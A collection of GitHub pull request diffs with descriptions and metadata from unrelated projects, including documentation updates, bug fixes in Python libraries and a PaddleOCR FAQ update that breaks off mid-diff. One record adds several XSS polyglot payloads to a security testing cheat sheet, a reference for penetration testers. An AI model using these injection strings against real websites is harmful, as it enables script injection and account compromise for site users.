a Discord bot that is used to gather data for the assistant, as a -complement to the web data gathering application. Its source code is in the -[discord-bot](https://github.com/LAION-AI/Open-Assistant/tree/main/discord-bot) -directory and it's written in Python. +These are the Discord bots mentioned above. Their source code is in the +[discord-bots](https://github.com/LAION-AI/Open-Assistant/tree/main/discord-bots) +directory. ### The FastAPI backend -This provides an API that's used by the web frontend and the Discord bot to +This provides an API that's used by the web frontend and the Discord bots to store conversation trees and their metadata. It's written in Python using FastAPI as framework and its source code is in the [backend directory](https://github.com/LAION-AI/Open-Assistant/tree/main/backend). 
@@ -168,7 +166,7 @@ There's also a Redis database, called `redis` in the Dockerfile, for caching API requets. In the Dockerfile, there are also two containers with development support tools -for the databases: `adminer`, that can be used to inspect the Postgres +for the databases: `adminer`, which can be used to inspect the Postgres databases, and `redis-insights` to inspect the Redis database. Although there's some data already in the Postgres backend database, more can be @@ -182,12 +180,13 @@ conversation tree and the work package. ### The inference service -The inference service will be the component that answers prompts when the model -is ready, i.e., the assistant. It's written in Python and its source code is in -the [inference](https://github.com/LAION-AI/Open-Assistant/tree/main/inference) +The inference service is the component that answers prompts using a model, i.e., +it is the assistant itself. It's written in Python and its source code is in the +[inference](https://github.com/LAION-AI/Open-Assistant/tree/main/inference) directory. It has a server and several workers. It also has its own Postgres database in a container called `inference-db` in the Dockerfile, and a Redis -database in the `redis-inference` container. +database in the `redis-inference` container. There's another container for +safety called `inference-safety`. The server is a FastAPI application that communicates via websockets with the workers, which are the ones that use the model to carry out the inference. @@ -208,7 +207,9 @@ explains how to contribute a new dataset. There's also a [notebooks](https://github.com/LAION-AI/Open-Assistant/tree/main/notebooks) -directory with different notebooks to process the data. +directory with different notebooks for data scraping and augmentation, but it's +being deprecated in favor of the directory +[data/datasets](https://github.com/LAION-AI/Open-Assistant/blob/main/data/datasets). ### The docs @@ -242,10 +243,16 @@ website directory. - `inference`. It includes these containers: - - `inference-db`, `inference-server`, `inference-worker`, `inference-redis` + - `inference-db`, `inference-server`, `inference-worker`, `inference-redis`, + `inference-safety` + +- `inference-dev`. It includes these containers: + + - `db`, `web-db`, `backend` - `observability`. It includes tools to monitor the application. It includes these containers: + - `prometheus`, `grafana`, `netdata` Notice that you can combine profiles, for example, `ci` and `observability`. @@ -277,12 +284,12 @@ flowchart TD infworker1((inference-worker <br> 1)) infworker2((inference-worker <br> ...)) infworkerN((inference-worker <br> n)) - infserv(("inference-server <br> (FastAPI)")) - infserv --> infdb(("inference-db <br> (Postgres)")) - infserv --> infredis(("inference-redis")) + infserv(("inference-server <br> (FastAPI)")) --> infdb(("inference-db <br> (Postgres)")) + infsafety((inference-safety)) infserv --> infworker1 infserv --> infworker2 infserv --> infworkerN + infserv --> infsafety end subgraph support[Dev support tools] adminer((adminer)) @@ -312,7 +319,7 @@ Lead, [Christoph Schumann](https://github.com/christophschuhmann), who is the Organizational Lead and a founder of [LAION](https://laion.ai/), and Huu Nguyen, from [Ontocord](https://github.com/ontocord). -There's a +There's a [Teams page](https://open-assistant.io/team) and a [CODEOWNERS](https://github.com/LAION-AI/Open-Assistant/blob/main/CODEOWNERS) file that lists the code owners of different parts of the project. However, there are many
https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/2623
2023-04-16T18:31:46Z
2023-04-16T18:38:12Z
2023-04-16T18:38:12Z
2023-04-16T18:38:13Z
1,803
LAION-AI/Open-Assistant
37,057
Correcting the Gaussian Formula
diff --git a/maths/gaussian.py b/maths/gaussian.py index 5d5800e00989..a5dba50a927d 100644 --- a/maths/gaussian.py +++ b/maths/gaussian.py @@ -1,9 +1,5 @@ """ Reference: https://en.wikipedia.org/wiki/Gaussian_function - -python/black : True -python : 3.7.3 - """ from numpy import exp, pi, sqrt @@ -16,6 +12,12 @@ def gaussian(x, mu: float = 0.0, sigma: float = 1.0) -> int: >>> gaussian(24) 3.342714441794458e-126 + >>> gaussian(1, 4, 2) + 0.06475879783294587 + + >>> gaussian(1, 5, 3) + 0.05467002489199788 + Supports NumPy Arrays Use numpy.meshgrid with this to generate gaussian blur on images. >>> import numpy as np @@ -49,8 +51,8 @@ def gaussian(x, mu: float = 0.0, sigma: float = 1.0) -> int: >>> gaussian(2523, mu=234234, sigma=3425) 0.0 - """ - return 1 / sqrt(2 * pi * sigma ** 2) * exp(-((x - mu) ** 2) / 2 * sigma ** 2) + """ + return 1 / sqrt(2 * pi * sigma ** 2) * exp(-((x - mu) ** 2) / (2 * sigma ** 2)) if __name__ == "__main__":
I have added parentheses around the `2 * sigma ** 2` term.

### **Describe your change:**

* [ ] Add an algorithm?
* [x] Fix a bug or typo in an existing algorithm?
* [ ] Documentation change?

### **Checklist:**

* [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md).
* [x] This pull request is all my own work -- I have not plagiarized.
* [x] I know that pull requests will not be merged if they fail the automated tests.
* [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms.
* [x] All new Python files are placed inside an existing directory.
* [x] All filenames are in all lowercase characters with no spaces or dashes.
* [x] All functions and variable names follow Python naming conventions.
* [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html).
* [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing.
* [x] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation.
* [x] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
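For reference, the density the corrected return statement computes is the standard Gaussian PDF; without the added parentheses the code divided by 2 and then multiplied by sigma squared, i.e. it effectively computed exp(-(x-mu)^2 * sigma^2 / 2).

```latex
f(x \mid \mu, \sigma) = \frac{1}{\sqrt{2\pi\sigma^{2}}}
    \exp\!\left(-\frac{(x-\mu)^{2}}{2\sigma^{2}}\right)
```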
https://api.github.com/repos/TheAlgorithms/Python/pulls/2249
2020-07-28T20:09:04Z
2020-07-29T19:32:37Z
2020-07-29T19:32:37Z
2020-07-30T08:33:34Z
386
TheAlgorithms/Python
29,556
Add EXIF rotation to YOLOv5 Hub inference
diff --git a/models/common.py b/models/common.py index 5ffb8440b60..9911b207d06 100644 --- a/models/common.py +++ b/models/common.py @@ -1,9 +1,9 @@ # YOLOv5 common modules -import math from copy import copy from pathlib import Path +import math import numpy as np import pandas as pd import requests @@ -12,7 +12,7 @@ from PIL import Image from torch.cuda import amp -from utils.datasets import letterbox +from utils.datasets import exif_transpose, letterbox from utils.general import non_max_suppression, make_divisible, scale_coords, increment_path, xyxy2xywh, save_one_box from utils.plots import colors, plot_one_box from utils.torch_utils import time_synchronized @@ -252,9 +252,10 @@ def forward(self, imgs, size=640, augment=False, profile=False): for i, im in enumerate(imgs): f = f'image{i}' # filename if isinstance(im, str): # filename or uri - im, f = np.asarray(Image.open(requests.get(im, stream=True).raw if im.startswith('http') else im)), im + im, f = Image.open(requests.get(im, stream=True).raw if im.startswith('http') else im), im + im = np.asarray(exif_transpose(im)) elif isinstance(im, Image.Image): # PIL Image - im, f = np.asarray(im), getattr(im, 'filename', f) or f + im, f = np.asarray(exif_transpose(im)), getattr(im, 'filename') or f files.append(Path(f).with_suffix('.jpg').name) if im.shape[0] < 5: # image in CHW im = im.transpose((1, 2, 0)) # reverse dataloader .transpose(2, 0, 1) diff --git a/utils/datasets.py b/utils/datasets.py index 55f046cd56d..f7315522e37 100755 --- a/utils/datasets.py +++ b/utils/datasets.py @@ -64,6 +64,32 @@ def exif_size(img): return s +def exif_transpose(image): + """ + Transpose a PIL image accordingly if it has an EXIF Orientation tag. + From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py + + :param image: The image to transpose. + :return: An image. + """ + exif = image.getexif() + orientation = exif.get(0x0112, 1) # default 1 + if orientation > 1: + method = {2: Image.FLIP_LEFT_RIGHT, + 3: Image.ROTATE_180, + 4: Image.FLIP_TOP_BOTTOM, + 5: Image.TRANSPOSE, + 6: Image.ROTATE_270, + 7: Image.TRANSVERSE, + 8: Image.ROTATE_90, + }.get(orientation) + if method is not None: + image = image.transpose(method) + del exif[0x0112] + image.info["exif"] = exif.tobytes() + return image + + def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0, rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix=''): # Make sure only the first process in DDP process the dataset first, and the following others can use the cache
## 🛠️ PR Summary <sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub> ### 🌟 Summary Improved image loading with EXIF-based auto-rotation in YOLOv5. ### 📊 Key Changes - Added `exif_transpose` function to correct image orientation based on EXIF data. - Integrated `exif_transpose` into the image loading process within the `forward` method. - Minor code rearrangement: moved `import math` for better organization. ### 🎯 Purpose & Impact - 🔄 Ensures images are correctly oriented as per their EXIF orientation tag, preventing issues with wrongly rotated images during processing. - 🖼️ Improves the robustness of the model's inference on images uploaded directly from various devices, particularly smartphones. - ➡️ Potential impact includes more accurate detections and a better user experience with YOLOv5, especially when handling images from different sources with orientation metadata.
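A usage sketch (hypothetical file names): Pillow ships an equivalent helper, `ImageOps.exif_transpose`, which the `exif_transpose` in this diff is adapted from, and with this PR the Hub model applies the same correction when you pass a filename.

```python
import torch
from PIL import Image, ImageOps

im = Image.open("phone_photo.jpg")
print(im.getexif().get(0x0112, 1))     # EXIF Orientation tag (1 = already upright)
upright = ImageOps.exif_transpose(im)  # rotate/flip according to the tag

model = torch.hub.load("ultralytics/yolov5", "yolov5s")
results = model("phone_photo.jpg")     # with this PR, the EXIF rotation is applied automatically
results.print()
```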
https://api.github.com/repos/ultralytics/yolov5/pulls/3852
2021-07-01T09:24:49Z
2021-07-02T11:25:55Z
2021-07-02T11:25:54Z
2024-01-19T17:12:03Z
830
ultralytics/yolov5
24,844
Added a couple of AWS/Kubernetes answers
diff --git a/certificates/aws-cloud-practitioner.md b/certificates/aws-cloud-practitioner.md index 75c273098..88d32ae64 100644 --- a/certificates/aws-cloud-practitioner.md +++ b/certificates/aws-cloud-practitioner.md @@ -40,6 +40,13 @@ SAAS * Public * Hybrid * Private</summary><br><b> + +- Public - Public cloud is when you leverage cloud services over the open internet on hardware owned by the cloud provider, but its usage is shared by other companies.<br> + +- Hybrid - A hybrid cloud is a cloud computing environment that uses a mix of combining a public and private cloud environment, like an on-premises data center, and public CSPs.<br> + +- Private - Private cloud means that the cloud infrastructure is provisioned for exclusive use by a single organization. + [Read more](https://aws.amazon.com/types-of-cloud-computing/) </b></details> #### AWS Global Infrastructure diff --git a/exercises/aws/README.md b/exercises/aws/README.md index 404b05051..3f8838eea 100644 --- a/exercises/aws/README.md +++ b/exercises/aws/README.md @@ -1246,7 +1246,7 @@ For example, port `2017` and endpoint `/health`. <details> <summary>Which type of AWS load balancer is used in the following drawing?<br> -<img src="images/aws/identify_load_balancer.png" width="300x;" height="400px;"/> +<img src="images/aws/identify_load_balancer.png" width="300px;" height="400px;"/> </summary><br><b> Application Load Balancer (routing based on different endpoints + HTTP is used). diff --git a/exercises/kubernetes/README.md b/exercises/kubernetes/README.md index e55a4a1cf..4fd8f3ee3 100644 --- a/exercises/kubernetes/README.md +++ b/exercises/kubernetes/README.md @@ -137,9 +137,9 @@ False. A Kubernetes cluster consists of at least 1 master and can have 0 workers <details> <summary>Place the components on the right side of the image in the right place in the drawing<br> -<img src="images/kubernetes/kubernetes_components.png"/> +<img src="images/kubernetes/kubernetes_components.png" height="300px" width="300px"/> </summary><br><b> -<img src="images/kubernetes/kubernetes_components_solution.png"/> +<img src="images/kubernetes/kubernetes_components_solution.png" height="300px" width="300px"/> </b></details> <details> @@ -1015,6 +1015,7 @@ etcd <details> <summary>What is etcd?</summary><br><b> + etcd is an open source distributed key-value store used to hold and manage the critical information that distributed systems need to keep running.[Read more](https://www.redhat.com/en/topics/containers/what-is-etcd) </b></details> <details> @@ -1248,10 +1249,12 @@ kubectl delete pods --field-selector=status.phase!='Running' <details> <summary>What <code>kubectl logs [pod-name]</code> command does?</summary><br><b> + Print the logs for a container in a pod. </b></details> <details> <summary>What <code>kubectl describe pod [pod name] does?</code> command does?</summary><br><b> + Show details of a specific resource or group of resources. </b></details> <details> @@ -1397,6 +1400,7 @@ It includes: <details> <summary>Explain StatefulSet</summary><br><b> + StatefulSet is the workload API object used to manage stateful applications. Manages the deployment and scaling of a set of Pods, and provides guarantees about the ordering and uniqueness of these Pods.[Learn more](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/) </b></details> #### Kubernetes - Secrets @@ -1666,6 +1670,7 @@ To fix it, these lines should placed in the spec of the cron job, above or under <details> <summary>Explain Imperative Management vs. 
Declarative Management</summary><br><b> + </b></details> <details> @@ -1680,6 +1685,7 @@ Namespaces will allow to limit resources and also make sure there are no collisi <details> <summary>What Kube Proxy does?</summary><br><b> + Kube Proxy is a network proxy that runs on each node in your cluster, implementing part of the Kubernetes Service concept </b></details> <details> @@ -1722,6 +1728,7 @@ Scale the number of pods automatically on observed CPU utilization. <details> <summary>What does being cloud-native mean?</summary><br><b> + The term cloud native refers to the concept of building and running applications to take advantage of the distributed computing offered by the cloud delivery model. </b></details> <details>
https://api.github.com/repos/bregman-arie/devops-exercises/pulls/204
2022-01-24T15:30:12Z
2022-01-24T17:27:08Z
2022-01-24T17:27:08Z
2022-01-24T17:27:08Z
1,131
bregman-arie/devops-exercises
17,478
include low, high, & dtype in spaces.Box.__repr__
diff --git a/gym/spaces/box.py b/gym/spaces/box.py index bad74f7ac09..0f9f26f92ff 100644 --- a/gym/spaces/box.py +++ b/gym/spaces/box.py @@ -134,7 +134,7 @@ def from_jsonable(self, sample_n): return [np.asarray(sample) for sample in sample_n] def __repr__(self): - return "Box" + str(self.shape) + return "Box({}, {}, {}, {})".format(self.low.min(), self.high.max(), self.shape, self.dtype) def __eq__(self, other): return isinstance(other, Box) and (self.shape == other.shape) and np.allclose(self.low, other.low) and np.allclose(self.high, other.high)
Multitask learners need a way to make a sensor for each space, and it's possible for two different Box spaces to have the same shape but different low/high/dtype. This pull request adds the minimum low value, the maximum high value, and the dtype to `Box.__repr__`, so that `str(box_space)` can be used as a key in a ModuleDict of sensors (this helps normalize inputs).
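As a rough sketch of the motivation (assuming a gym version that includes this change; the exact repr strings are indicative), two spaces with the same shape now produce distinct strings:

```python
# Shape alone cannot distinguish these two observation spaces,
# but the extended __repr__ can, so str(space) works as a dict key.
import numpy as np
from gym.spaces import Box

a = Box(low=0.0, high=1.0, shape=(3,), dtype=np.float32)
b = Box(low=-1.0, high=1.0, shape=(3,), dtype=np.float64)

print(a)  # e.g. Box(0.0, 1.0, (3,), float32)
print(b)  # e.g. Box(-1.0, 1.0, (3,), float64)
sensors = {str(a): "normalizer_a", str(b): "normalizer_b"}  # distinct keys per space
```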
https://api.github.com/repos/openai/gym/pulls/1974
2020-06-23T18:31:04Z
2020-08-14T22:30:58Z
2020-08-14T22:30:58Z
2020-08-14T22:30:59Z
182
openai/gym
5,544
kraken max amount
diff --git a/js/kraken.js b/js/kraken.js index 67a01b791b91..2902bbe06f06 100644 --- a/js/kraken.js +++ b/js/kraken.js @@ -457,7 +457,7 @@ module.exports = class kraken extends Exchange { 'limits': { 'amount': { 'min': minAmount, - 'max': Math.pow (10, precision['amount']), + 'max': undefined, }, 'price': { 'min': Math.pow (10, -precision['price']),
This limit looks strange, and it does not hold in practice: I can create an order with a bigger amount.
https://api.github.com/repos/ccxt/ccxt/pulls/10744
2021-11-30T15:45:58Z
2021-11-30T17:29:14Z
2021-11-30T17:29:14Z
2021-11-30T17:29:14Z
131
ccxt/ccxt
13,915
BUG: Fix conditional for underlying price in io.data.options.
diff --git a/pandas/io/data.py b/pandas/io/data.py index 13ced745b7b3f..0b1601b143be0 100644 --- a/pandas/io/data.py +++ b/pandas/io/data.py @@ -736,9 +736,8 @@ def _get_option_data(self, month, year, expiry, name): " found".format(table_loc, ntables)) option_data = _parse_options_data(tables[table_loc]) - option_data = self._process_data(option_data) option_data['Type'] = name[:-1] - option_data.set_index(['Strike', 'Expiry', 'Type', 'Symbol'], inplace=True) + option_data = self._process_data(option_data, name[:-1]) if month == CUR_MONTH and year == CUR_YEAR: setattr(self, name, option_data) @@ -859,8 +858,7 @@ def get_near_stock_price(self, above_below=2, call=True, put=False, month=None, year=None, expiry=None): """ ***Experimental*** - Cuts the data frame opt_df that is passed in to only take - options that are near the current stock price. + Returns a data frame of options that are near the current stock price. Parameters ---------- @@ -889,7 +887,6 @@ def get_near_stock_price(self, above_below=2, call=True, put=False, Note: Format of returned data frame is dependent on Yahoo and may change. """ - year, month, expiry = self._try_parse_dates(year, month, expiry) to_ret = Series({'calls': call, 'puts': put}) to_ret = to_ret[to_ret].index @@ -897,26 +894,31 @@ def get_near_stock_price(self, above_below=2, call=True, put=False, data = {} for nam in to_ret: - if month: - m1 = _two_char_month(month) - name = nam + m1 + str(year)[2:] + df = self._get_option_data(month, year, expiry, nam) + data[nam] = self.chop_data(df, above_below, self.underlying_price) + + return concat([data[nam] for nam in to_ret]).sortlevel() + + def chop_data(self, df, above_below=2, underlying_price=None): + """Returns a data frame only options that are near the current stock price.""" + if not underlying_price: try: - df = getattr(self, name) + underlying_price = self.underlying_price except AttributeError: - meth_name = 'get_{0}_data'.format(nam[:-1]) - df = getattr(self, meth_name)(expiry=expiry) + underlying_price = np.nan - if self.underlying_price: - start_index = np.where(df.index.get_level_values('Strike') - > self.underlying_price)[0][0] + if underlying_price is not np.nan: + start_index = np.where(df.index.get_level_values('Strike') + > underlying_price)[0][0] - get_range = slice(start_index - above_below, + get_range = slice(start_index - above_below, start_index + above_below + 1) - chop = df[get_range].dropna(how='all') - data[nam] = chop + df = df[get_range].dropna(how='all') + + return df + - return concat([data[nam] for nam in to_ret]).sortlevel() @staticmethod def _try_parse_dates(year, month, expiry): @@ -1048,7 +1050,7 @@ def get_forward_data(self, months, call=True, put=False, near=False, frame = self.get_near_stock_price(call=call, put=put, above_below=above_below, month=m2, year=y2) - frame = self._process_data(frame) + frame = self._process_data(frame, name[:-1]) all_data.append(frame) @@ -1178,7 +1180,7 @@ def _parse_url(self, url): return root - def _process_data(self, frame): + def _process_data(self, frame, type): """ Adds columns for Expiry, IsNonstandard (ie: deliverable is not 100 shares) and Tag (the tag indicating what is actually deliverable, None if standard). 
@@ -1195,5 +1197,7 @@ def _process_data(self, frame): frame['Underlying_Price'] = self.underlying_price frame["Quote_Time"] = self.quote_time frame.rename(columns={'Open Int': 'Open_Int'}, inplace=True) + frame['Type'] = type + frame.set_index(['Strike', 'Expiry', 'Type', 'Symbol'], inplace=True) return frame diff --git a/pandas/io/tests/test_data.py b/pandas/io/tests/test_data.py index 8b5a81f050ced..15ebeba941ccd 100644 --- a/pandas/io/tests/test_data.py +++ b/pandas/io/tests/test_data.py @@ -250,6 +250,9 @@ def setUpClass(cls): cls.html2 = os.path.join(cls.dirpath, 'yahoo_options2.html') cls.root1 = cls.aapl._parse_url(cls.html1) cls.root2 = cls.aapl._parse_url(cls.html2) + cls.tables1 = cls.aapl._parse_option_page_from_yahoo(cls.root1) + cls.unprocessed_data1 = web._parse_options_data(cls.tables1[cls.aapl._TABLE_LOC['puts']]) + cls.data1 = cls.aapl._process_data(cls.unprocessed_data1, 'put') @classmethod def tearDownClass(cls): @@ -324,6 +327,13 @@ def test_sample_page_price_quote_time1(self): self.assertIsInstance(price, (int, float, complex)) self.assertIsInstance(quote_time, (datetime, Timestamp)) + def test_chop(self): + #regression test for #7625 + self.aapl.chop_data(self.data1, above_below=2, underlying_price=np.nan) + chopped = self.aapl.chop_data(self.data1, above_below=2, underlying_price=300) + self.assertIsInstance(chopped, DataFrame) + self.assertTrue(len(chopped) > 1) + @network def test_sample_page_price_quote_time2(self): #Tests the weekday quote time format @@ -334,10 +344,7 @@ def test_sample_page_price_quote_time2(self): @network def test_sample_page_chg_float(self): #Tests that numeric columns with comma's are appropriately dealt with - tables = self.aapl._parse_option_page_from_yahoo(self.root1) - data = web._parse_options_data(tables[self.aapl._TABLE_LOC['puts']]) - option_data = self.aapl._process_data(data) - self.assertEqual(option_data['Chg'].dtype, 'float64') + self.assertEqual(self.data1['Chg'].dtype, 'float64') class TestOptionsWarnings(tm.TestCase):
Refactor and regression test. Fixes #7685
https://api.github.com/repos/pandas-dev/pandas/pulls/7688
2014-07-08T05:31:10Z
2014-07-08T23:33:47Z
2014-07-08T23:33:47Z
2014-07-09T04:38:52Z
1,577
pandas-dev/pandas
44,833
fix disconnecting sleep
diff --git a/code/default/gae_proxy/local/check_ip.py b/code/default/gae_proxy/local/check_ip.py index e3257f7030..faa94fba5e 100755 --- a/code/default/gae_proxy/local/check_ip.py +++ b/code/default/gae_proxy/local/check_ip.py @@ -140,7 +140,7 @@ def load_proxy_config(): network_fail_lock = threading.Lock() def connect_ssl(ip, port=443, timeout=5, check_cert=True, close_cb=None): - if check_local_network.is_ok(ip): + if not check_local_network.is_ok(ip): with network_fail_lock: time.sleep(0.1)
https://api.github.com/repos/XX-net/XX-Net/pulls/8732
2017-11-28T19:31:49Z
2017-11-28T23:56:05Z
2017-11-28T23:56:05Z
2017-11-28T23:56:05Z
148
XX-net/XX-Net
17,086
Fix: mask editor inpaint area
diff --git a/web/extensions/core/maskeditor.js b/web/extensions/core/maskeditor.js index bb2f16d42b..f6b035bdce 100644 --- a/web/extensions/core/maskeditor.js +++ b/web/extensions/core/maskeditor.js @@ -110,6 +110,7 @@ class MaskEditorDialog extends ComfyDialog { createButton(name, callback) { var button = document.createElement("button"); + button.style.pointerEvents = "auto"; button.innerText = name; button.addEventListener("click", callback); return button; @@ -146,6 +147,7 @@ class MaskEditorDialog extends ComfyDialog { divElement.style.display = "flex"; divElement.style.position = "relative"; divElement.style.top = "2px"; + divElement.style.pointerEvents = "auto"; self.brush_slider_input = document.createElement('input'); self.brush_slider_input.setAttribute('type', 'range'); self.brush_slider_input.setAttribute('min', '1'); @@ -173,6 +175,7 @@ class MaskEditorDialog extends ComfyDialog { bottom_panel.style.left = "20px"; bottom_panel.style.right = "20px"; bottom_panel.style.height = "50px"; + bottom_panel.style.pointerEvents = "none"; var brush = document.createElement("div"); brush.id = "brush";
I tried to do an inpaint on my image, and found that I was unable to brush the bottom area, as shown below: <img width="1278" alt="image" src="https://github.com/comfyanonymous/ComfyUI/assets/16166258/8e8aa049-bc90-40a2-8e4d-26ab22ade157"> After investigation, it was caused by an invisible div element that wrapped the buttons and slider. There was an issue https://github.com/comfyanonymous/ComfyUI/issues/2246 and a PR https://github.com/comfyanonymous/ComfyUI/pull/2249 about this problem, but that PR didn't fix it completely, so I created this PR.
https://api.github.com/repos/comfyanonymous/ComfyUI/pulls/2679
2024-01-30T06:34:51Z
2024-01-31T06:17:24Z
2024-01-31T06:17:24Z
2024-01-31T06:17:25Z
303
comfyanonymous/ComfyUI
18,038
Add new attack patterns from Daniel Miessler
diff --git a/XSS injection/README.md b/XSS injection/README.md index 5c72b632e5..c828accab8 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -328,6 +328,9 @@ Polyglot XSS - Rsnake Polyglot XSS - Daniel Miessler ```javascript +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// +'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
https://github.com/danielmiessler/SecLists/edit/master/Fuzzing/Polyglots/XSS-Polyglots.txt New attack patterns: lines 1, 2, and 3.
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/28
2018-11-16T11:45:57Z
2018-11-16T12:49:36Z
2018-11-16T12:49:36Z
2018-11-16T12:49:36Z
375
swisskyrepo/PayloadsAllTheThings
8,347
Fix Windows file descriptor leak
diff --git a/scrapy/extensions/feedexport.py b/scrapy/extensions/feedexport.py index ce2846ebada..6fb6397b1e2 100644 --- a/scrapy/extensions/feedexport.py +++ b/scrapy/extensions/feedexport.py @@ -242,7 +242,9 @@ def open_spider(self, spider): def close_spider(self, spider): slot = self.slot if not slot.itemcount and not self.store_empty: - return + # We need to call slot.storage.store nonetheless to get the file + # properly closed. + return defer.maybeDeferred(slot.storage.store, slot.file) if self._exporting: slot.exporter.finish_exporting() self._exporting = False diff --git a/tests/test_feedexport.py b/tests/test_feedexport.py index f32ac2a4be7..e1436fbe5a7 100644 --- a/tests/test_feedexport.py +++ b/tests/test_feedexport.py @@ -417,7 +417,7 @@ def run_and_export(self, spider_cls, settings=None): content = f.read() finally: - shutil.rmtree(tmpdir, ignore_errors=True) + shutil.rmtree(tmpdir) defer.returnValue(content)
Fixes #3391
https://api.github.com/repos/scrapy/scrapy/pulls/4023
2019-09-17T08:22:16Z
2019-10-22T13:12:53Z
2019-10-22T13:12:53Z
2019-10-22T13:13:07Z
274
scrapy/scrapy
34,267
add faq 20210621
diff --git a/README_ch.md b/README_ch.md index 1dcde536fc..1fcb1fb5fc 100755 --- a/README_ch.md +++ b/README_ch.md @@ -21,7 +21,7 @@ PaddleOCR同时支持动态图与静态图两种编程范式 - 静态图版本:develop分支 **近期更新** -- 2021.6.9 [FAQ](./doc/doc_ch/FAQ.md)新增5个高频问题,总数238个,每周一都会更新,欢迎大家持续关注。 +- 2021.6.22 [FAQ](./doc/doc_ch/FAQ.md)新增5个高频问题,总数243个,每周一都会更新,欢迎大家持续关注。 - PaddleOCR研发团队对最新发版内容技术深入解读,4月13日晚上19:00,[直播地址](https://live.bilibili.com/21689802)。 - 2021.4.8 release 2.1版本,新增AAAI 2021论文[端到端识别算法PGNet](./doc/doc_ch/pgnet.md)开源,[多语言模型](./doc/doc_ch/multi_languages.md)支持种类增加到80+。 - 2021.2.8 正式发布PaddleOCRv2.0(branch release/2.0)并设置为推荐用户使用的默认分支. 发布的详细内容,请参考: https://github.com/PaddlePaddle/PaddleOCR/releases/tag/v2.0.0 @@ -117,8 +117,8 @@ PaddleOCR同时支持动态图与静态图两种编程范式 - [效果展示](#效果展示) - FAQ - [【精选】OCR精选10个问题](./doc/doc_ch/FAQ.md) - - [【理论篇】OCR通用44个问题](./doc/doc_ch/FAQ.md) - - [【实战篇】PaddleOCR实战174个问题](./doc/doc_ch/FAQ.md) + - [【理论篇】OCR通用50个问题](./doc/doc_ch/FAQ.md) + - [【实战篇】PaddleOCR实战183个问题](./doc/doc_ch/FAQ.md) - [技术交流群](#欢迎加入PaddleOCR技术交流群) - [参考文献](./doc/doc_ch/reference.md) - [许可证书](#许可证书) diff --git a/doc/doc_ch/FAQ.md b/doc/doc_ch/FAQ.md index 51f4bd36fa..25db025845 100755 --- a/doc/doc_ch/FAQ.md +++ b/doc/doc_ch/FAQ.md @@ -9,38 +9,35 @@ ## PaddleOCR常见问题汇总(持续更新) -* [近期更新(2021.6.9)](#近期更新) +* [近期更新(2021.6.22)](#近期更新) * [【精选】OCR精选10个问题](#OCR精选10个问题) -* [【理论篇】OCR通用44个问题](#OCR通用问题) - * [基础知识14题](#基础知识) - * [数据集9题](#数据集2) - * [模型训练调优22题](#模型训练调优2) -* [【实战篇】PaddleOCR实战179个问题](#PaddleOCR实战问题) - * [使用咨询72题](#使用咨询) +* [【理论篇】OCR通用50个问题](#OCR通用问题) + * [基础知识16题](#基础知识) + * [数据集10题](#数据集2) + * [模型训练调优24题](#模型训练调优2) +* [【实战篇】PaddleOCR实战183个问题](#PaddleOCR实战问题) + * [使用咨询77题](#使用咨询) * [数据集19题](#数据集3) * [模型训练调优39题](#模型训练调优3) * [预测部署48题](#预测部署3) <a name="近期更新"></a> -## 近期更新(2021.6.9) +## 近期更新(2021.6.22) -#### Q2.1.14: 在识别模型中,为什么降采样残差结构的stride为(2, 1)? -**A**: stride为(2, 1),表示在图像y方向(高度方向)上stride为2,x方向(宽度方向)上为1。由于待识别的文本图像通常为长方形,这样只在高度方向做下采样,尽量保留宽度方向的序列信息,避免宽度方向下采样后丢失过多的文字信息。 +#### Q2.1.15: 文本识别方法CRNN关键技术有哪些? +**A**: CRNN 关键技术包括三部分。(1)CNN提取图像卷积特征。(2)深层双向LSTM网络,在卷积特征的基础上继续提取文字序列特征。(3)Connectionist Temporal Classification(CTC),解决训练时字符无法对齐的问题。 -#### Q3.2.19: 如何合成手写中文数据集? -**A**: 手写数据集可以通过手写单字数据集合成得到。随机选取一定数量的单字图片和对应的label,将图片高度resize为随机的统一高度后拼接在一起,即可得到合成数据集。对于需要添加文字背景的情况,建议使用阈值化将单字图片的白色背景处理为透明背景,再与真实背景图进行合成。具体可以参考文档[手写数据集](https://github.com/PaddlePaddle/PaddleOCR/blob/a72d6f23be9979e0c103d911a9dca3e4613e8ccf/doc/doc_ch/handwritten_datasets.md)。 +#### Q2.1.16: 百度自研的SRN文本识别方法特点有哪些? +**A**: SRN文本识别方法特点主要有四个部分:(1)使用Transformer Units(TUs)模块加强图像卷积特征的表达能力。(2)提出Parallel Visual Attention Module(PVAM)模块挖掘特征之间的相互关系。(3)提出Global Semantic Reasoning Module(GSRM)模块挖掘识别结果语义相互关系。(4)提出Visual-Semantic Fusion Decoder(VSFD)模块有效融合PVAM提取的视觉特征和GSRM提取的语义特征。 -#### 